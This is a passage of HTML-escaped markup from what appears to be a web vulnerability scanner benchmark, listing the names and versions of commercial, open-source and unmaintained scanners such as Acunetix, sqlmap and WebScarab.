&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Acunetix Free Edition&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; v8.0-20120509 (&lt;b&gt;Acunetix&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;N-Stalker 2009 Free Edition&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; v7.0.0.223&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(&lt;b&gt;N-Stalker&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WebSecurify&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.9&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;latest free edition (&lt;b&gt;GNUCITIZEN&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Sandcat Free Edition&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v4.0.0.1 (&lt;b&gt;Syhunt)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WebCruiser&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v2.4.2 FE&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;JSKY Free Edition&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.0.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Scrawler&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(&lt;b&gt;HP&lt;/b&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Safe3WVS&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v10.1 FE (&lt;b&gt;Safe3 Network Center&lt;/b&gt;)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The results of the following &lt;b&gt;open source&lt;/b&gt; scanners
were &lt;b&gt;included&lt;/b&gt; but &lt;b&gt;not&lt;/b&gt; &lt;b&gt;re-verified&lt;/b&gt;:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;sqlmap&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.0-Jul-5-2012 (Github) – already achieved mastery in its supported feature&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;DSSS (Damn Simple SQLi Scanner)&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; v0.1h&lt;b&gt;&lt;i&gt; – &lt;/i&gt;&lt;/b&gt;0.2h exists, will be tested in the
  future&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;aidSQL&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  02062011 – newer version released in 2013-05-27, will be tested in the future&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The results were compared to those of &lt;b&gt;unmaintained&lt;/b&gt;
scanners tested in the past:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;ProxyStrike&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v2.2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Grendel Scan&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;PowerFuzzer&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Oedipus&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.8.1 (v1.8.3 is around somewhere)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Xcobra&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.2&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;XSSploit&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.5&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;UWSS (Uber Web Security Scanner)&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; v0.0.2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Grabber&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WebScarab&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v20100820&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Mini MySqlat0r&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.5&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
